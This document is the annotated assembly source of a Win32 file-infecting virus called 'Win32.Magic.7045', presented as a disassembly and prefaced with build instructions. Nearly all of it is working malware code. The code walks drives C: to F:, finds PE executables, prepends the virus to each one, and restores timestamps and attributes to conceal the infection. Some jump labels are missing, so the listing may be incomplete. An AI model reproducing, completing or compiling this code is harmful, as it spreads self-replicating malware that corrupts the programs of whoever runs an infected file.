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comment *
Disassembly by ŰŰŰ ŰŰŰ ŰŰŰ ŰŰŰ ŰŰŰ ŰŰŰ
Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
all files in all directories at drive C:, D:, E: and F:, when executed, by
every file in current directory and Windows directory, when executed, by
prepending the virus to the original EXE file.
Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing:
TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32
.model flat
; KERNEL32.dll
extrn CopyFileA:proc
extrn CloseHandle:proc
extrn CreateFileMappingA:proc
extrn CreateProcessA:proc
extrn DeleteFileA:proc
extrn CreateFileA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn FlushViewOfFile:proc
extrn GetCommandLineA:proc
extrn GetCurrentDirectoryA:proc
extrn GetExitCodeProcess:proc
extrn GetFileSize:proc
extrn ExitProcess:proc
extrn GetProcAddress:proc
extrn GetStartupInfoA:proc
extrn GlobalAlloc:proc
extrn GlobalFree:proc
extrn GlobalLock:proc
extrn GlobalUnlock:proc
extrn MapViewOfFile:proc
extrn ReadFile:proc
extrn SetCurrentDirectoryA:proc
extrn SetFileAttributesA:proc
extrn SetFileTime:proc
extrn Sleep:proc
extrn UnmapViewOfFile:proc
extrn lstrcpyA:proc
extrn GetModuleHandleA:proc
; USER32.dll
extrn MessageBoxA:proc
VirusSize equ 1b85h ; Size of virus (7045 bytes)
nBufferLength equ 320h ; Size, in characters, of directory
; buffer
MAX_PATH equ 104h
FALSE equ 00h
TRUE equ 01h
; The "file or directory" is a
; directory
FILE_ATTRIBUTE_ARCHIVE equ 20h ; The file is an archive file.
; Applications use this attribute to
; mark files for backup or removal.
CREATE_NEW equ 01h ; Creates a new file. The function
; fails if the specified file already
; exists.
OPEN_EXISTING equ 03h ; Opens the file. The function fails
; if the file does not exist.
FILE_SHARE_READ equ 01h ; Other open operations can be
; performed on the file for read
; access. If the CreateFile function
; is opening the client end of a
; mailslot, this flag is specified.
FILE_SHARE_WRITE equ 02h ; Other open operations can be
; performed on the file for write
; access.
GENERIC_WRITE equ 40000000h
; Specifies write access to the file.
; Data can be written to the file and
; the file pointer can be moved.
GENERIC_READ equ 80000000h
; Specifies read access to the file.
; Data can be read from the file and
; the file pointer can be moved.
PAGE_READWRITE equ 04h ; Gives read-write access to the
; committed region of pages
FILE_MAP_WRITE equ 02h ; Read-write access
NORMAL_PRIORITY_CLASS equ 20h ; Indicates a normal process with no
; special scheduling needs.
cb DWORD ? ; Specifies the size, in bytes, of the
; structure.
lpReserved DWORD ? ; Reserved. Set this member to NULL
; before passing the structure to
; CreateProcess
lpDesktop DWORD ? ; Points to a zero-terminated string
; that specifies either the name of
; the desktop only or the name of both
; the window station and desktop for
; this process
lpTitle DWORD ? ; For console processes, this is the
; title displayed in the title bar if
; a new console window is created
dwX DWORD ? ; Specifies the x offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwY DWORD ? ; Specifies the y offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwXSize DWORD ? ; Specifies the width, in pixels, of
; the window if a new window is
; created
dwYSize DWORD ? ; Specifies the height, in pixels, of
; the window if a new window is
; created
dwXCountChars DWORD ? ; Specifies the screen buffer width in
; character columns
dwYCountChars DWORD ? ; Specifies the screen buffer height
; in character rows
dwFillAttribute DWORD ? ; Specifies the initial text and
; background colors if a new console
; window is created
dwFlags DWORD ? ; This is a bit field that determines
; whether certain STARTUPINFO members
; are used when the process creates a
; window
wShowWindow WORD ? ; Specifies the default value the first
; time
cbReserved2 WORD ? ; Reserved; must be zero
lpReserved2 DWORD ? ; Reserved; must be NULL
hStdInput DWORD ? ; Specifies a handle that will be used
; as the standard input handle of the
; process
hStdOutput DWORD ? ; Specifies a handle that will be used
; as the standard output handle of the
; process
hStdError DWORD ? ; Specifies a handle that will be used
; as the standard error handle of the
; process
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
hProcess DWORD ? ; Handle to the newly created process
hThread DWORD ? ; Handle to the primary thread of the
; newly created process
dwProcessId DWORD ? ; Global process identifier that can
; be used to identify a process
dwThreadId DWORD ? ; global thread identifiers that can
; be used to identify a thread
szFileName db '*.EXE',00h ; Name of file to search for
szFileName_ db '*.*',00h ; " " " " " "
szCurDir db 'c:\',00h ; Name of new current directory
db 'Magic People-Voodoo People !',00h
db 00h
ProcessInformation PROCESS_INFORMATION <>
dwExitCode dd ? ; Termination status
dwFileHandle dd ? ; File handle
dwFileHandle_ dd ? ; File handle
dwMappingHandle dd ? ; File mapping handle
lpMappedView dd ? ; Starting address of the mapped view
dwFileSize dd ? ; Low-order doubleword of the file
; size
infect_flag db ? ; Infection flag
exit_flag db ? ; Exit flag
NumberOfBytesRead dd ? ; Number of bytes read
lpFileExtension dd ? ; Pointer to file extension
StartupInfo STARTUPINFO <>
db 11ah dup(00h)
db 206h dup(?)
FindFileData WIN32_FIND_DATA <>
db 20eh dup(?)
cBuffer db VirusSize dup(?)
; Buffer that receives data
dwSearchHandle dd ? ; Search handle
dwSearchHandle_ dd ? ; Search handle
cBuffer_ db 320h dup(?) ; Buffer for current directory
cBuffer__ db 320h dup(?) ; Buffer for current directory
db 724h dup(?)
push offset StartupInfo ; Address of STARTUPINFO structure
call GetStartupInfoA
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
cmp byte ptr [esi+01h],':' ; Not Universal Naming Convention
; (UNC)?
je _lstrcpyA ; Equal? Jump to _lstrcpyA
inc eax ; Increase pointer to the command-line
; string for the current process
push eax ; EAX = address of string to copy
push offset szFileName__ ; Address of buffer
call lstrcpyA
lea esi,szFileName__ ; ESI = offset of szFileName__
inc esi ; Increase pointer to the command-line
; string for the current process
cmp byte ptr [esi],'.' ; Found dot in filename?
jne find_dot_in_filename ; Not equal? Jump to
; find_dot_in_filename
mov byte ptr [esi+04h],00 ; Store zero at end of filename
mov [lpFileExtension],esi ; Store pointer to file extension
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ ; Share mode
push GENERIC_READ ; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle],eax ; Store file handle
push eax ; EAX = file handle
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push VirusSize ; Number of bytes to read
push offset cBuffer ; Address of buffer that receives data
push eax ; Handle of file to read
call ReadFile
pop eax ; EAX = file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
cmp eax,VirusSize ; First generation?
je virus_exit ; Equal? Jump to virus_exit
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov [esi],'MOC.' ; Store file extension
cmp [esi+05h],'$$$$' ; Temporarily disnfected file?
je _DeleteFileA ; Equal? Jump to _DeleteFileA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
; How to create
push 00h ; Address of security descriptor
; Share mode
; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle_],eax ; Store file handle
push 00h ; Name of file-mapping object
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle_] ; Handle of file to map
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push [dwFileSize] ; Low-order doubleword of object size
push eax ; Address of buffer that receives data
push [dwFileHandle] ; Handle of file to read
call ReadFile
push 00h ; Number of bytes in range
push [lpMappedView] ; Starting address of the mapped view
call FlushViewOfFile
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
push [dwFileHandle_] ; Handle of object to close
call CloseHandle
push offset ProcessInformation
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
jmp _CloseHandle
mov [exit_flag],TRUE ; Exit code for all threads
push [dwFileHandle] ; Handle of object to close
call CloseHandle
call infect_drives
cmp [exit_flag],TRUE ; Exit code for all threads?
je _ExitProcess ; Equal? Jump to _ExitProcess
push offset dwExitCode ; Address to receive termination
; status
push [ProcessInformation.hProcess]
; Handle to the process
call GetExitCodeProcess
cmp [dwExitCode],00h ; No error?
je _CreateProcessA ; Equal? Jump to _CreateProcessA
jmp _GetExitCodeProcess
push offset ProcessInformation
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
mov [esi],'EXE.' ; Store file extension
mov [esi+05h],'$$$$' ; Store command-line
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
push 00h ; Exit code for all threads
call ExitProcess
push offset szFileName__ ; Address of name of file to delete
call DeleteFileA
jmp _ExitProcess
infect_drives proc near ; Infect drives
push offset cBuffer_ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
call infect_directories
mov ecx,04h ; Infect drive C:, D:, E: and F:
push ecx ; ECX = counter
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
call infect_directories
inc byte ptr [szCurDir] ; Increase drive letter
pop ecx ; ECX = counter
loop set_current_directory_loop
push offset szCurDir_ ; Address of name of new current
; directory
call SetCurrentDirectoryA
jmp _FindNextFileA
ret ; Return
infect_directories proc near ; Infect directories
push offset cBuffer__ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName_ ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle],eax ; Store search handle
push offset FindFileData ; Address of returned information
push [dwSearchHandle] ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
cmp [FindFileData.cFileName],'.'
; Directory?
je _FindNextFileA ; Equal? Jump to _FindNextFileA
mov eax,[FindFileData.dwFileAttributes]
; Directory?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
push offset szCurDir__ ; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData.cFileName
; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle_],eax ; Store search handle
je _FindNextFileA ; Function failed? Jump to
; _FindNextFileA
or eax,eax ; Function failed?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
call infect_file
push offset FindFileData ; Address of returned information
push [dwSearchHandle_] ; Handle of search
call FindNextFileA
jmp continue_a_file_search
ret ; Return
infect_file proc near ; Infect file
push FILE_ATTRIBUTE_ARCHIVE ; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
; Share mode
; Access (read-write) mode
push offset FindFileData.cFileName
; Address of name of the file
call CreateFileA
je _SetFileAttributesA ; Function failed? Jump to
; _SetFileAttributesA
mov [dwFileHandle],eax ; Store file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
push eax ; EAX = low-order doubleword of the
; file size
push 00h ; Name of file-mapping object
push eax ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle]
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
cmp [infect_flag],TRUE ; Infect file?
je infect_file_ ; Equal? Jump to infect_file_
mov esi,eax ; ESI = starting address of the mapped
; view
mov edi,[esi+3ch] ; EDI = offset of new executable (NE,
; LE,etc) header within disk file
cmp dword ptr [esi+edi],'EP'
; Portable Executable (PE)?
jne infect_exit ; Not equal? Jump to infect_exit
cmp [esi+6fh],'3NIW'
je infect_exit ; Equal? Jump to infect_exit
call _UnmapViewOfFile
mov [infect_flag],TRUE ; Infect file
mov eax,[dwFileSize] ; EAX = Low-order doubleword of the
; file size
add eax,VirusSize ; Add size of virus to low-order
; doubleword of the file size
jmp _CreateFileMappingA
mov [infect_flag],FALSE ; Don't infect file
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push edi esi ecx ; Save registers at stack
pushf ; Save flags at stack
add eax,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
add eax,VirusSize-01h ; Add size of virus minus one to
; starting address of the mapped view
mov edi,eax ; EDI = pointer to last byte of file
mov esi,[lpMappedView] ; ESI = starting address of the mapped
; view
add esi,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
mov ecx,[dwFileSize] ; ECX = low-order doubleword of the
; file size
dec esi ; ESI = pointer to last byte of
; original code
std ; Set direction flag
rep movsb ; Move original code to end of file
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
xor eax,eax ; Zero EAX
mov ecx,VirusSize ; Store seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep stosb ; Overwrite the first seven thousand
; and forty-five bytes of original
; code
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
lea esi,cBuffer ; ESI = offset of cBuffer
mov ecx,VirusSize ; Move seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep movsb ; Move virus to beginning of file
popf ; Load flags from stack
pop ecx esi edi ; Load registers from stack
call _UnmapViewOfFile
push offset FindFileData.ftLastWriteTime-08h
; Time the file was last written
push offset FindFileData.ftLastAccessTime-04h
; Time the file was last accessed
push offset FindFileData.ftCreationTime
; Time the file was created
push [dwFileHandle] ; Identifies the file
call SetFileTime
push [dwFileHandle] ; Handle of object to close
call CloseHandle
push [FindFileData.dwFileAttributes]
; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
ret ; Return
_UnmapViewOfFile proc near ; Unmaps a mapped view of a file from
; the calling process's address space
; and close it
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
ret ; Return
end code_begin |